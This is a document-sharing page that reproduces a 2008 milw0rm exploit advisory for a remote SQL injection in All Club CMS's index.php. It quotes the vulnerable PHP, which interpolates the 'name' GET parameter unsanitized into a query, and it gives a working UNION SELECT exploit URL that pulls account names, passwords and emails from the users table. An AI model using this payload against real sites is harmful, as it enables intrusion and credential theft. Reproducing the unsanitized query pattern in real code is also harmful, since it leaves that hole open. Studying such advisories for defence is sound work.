All Club CMS 0.0.2 index.php Remote SQL Injection Vulnerability.pdf

All Club CMS 0.0.2 index.php Remote SQL Injection Vulnerability.pdf, updated 6/7/21, 2:28 PM

visibility185
  verified

About Global Documents

Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.

Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.

 

Tag Cloud

1 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
2 All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
3 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
4
5
6 bug found by ka0x
7 D.O.M TEAM 2008
8 we are: ka0x, an0de, xarnuz
9 http://www.domlabs.org/
10
11 Script affected: All Club CMS
12 Vulnerability: Remote SQL Injection
13
14 Download: http://sourceforge.net/project/showfiles.php?group_id=209058
15 need magic_quotes_gpc = off
16
17
18 vuln code:
19
20 [...]
21
22 if (isset($_GET[’name’]) && (!(empty($_GET[’name’])))) {
23
24 $name = $_GET[’name’];
25 $name = stripslashes($name);
26 // stop hackers
27 if (eregi("http\:\/\/", $name)) {
28 echo "
  No go on the hack attempt.
";
29 // log attempt, from IP, etc.
30 if ($SYS_SET[’ban_attack_ip’]) {
31 // ban ip if ban_attack_ip
32 }
33 die();
34 }
35
36 $sth = $dbh−>prepare("SELECT * FROM accms_modules WHERE name=’$name’");
37
38 [...]
39
40
41 Stripslashes function only deletes backslashes (\) and the backslashes
42 doubles (\\) becomes simple (\).
43
44
45 Exploit:
46 http://[host]/accms_path/index.php?name=−1’/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,
7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*
47
48
49 __EOF__
50
51 # milw0rm.com [2008−02−05]
Page 1/1
All Club CMS 0.0.2 index.php Remote SQL Injection Vulnerability
ka0x
02/05/2008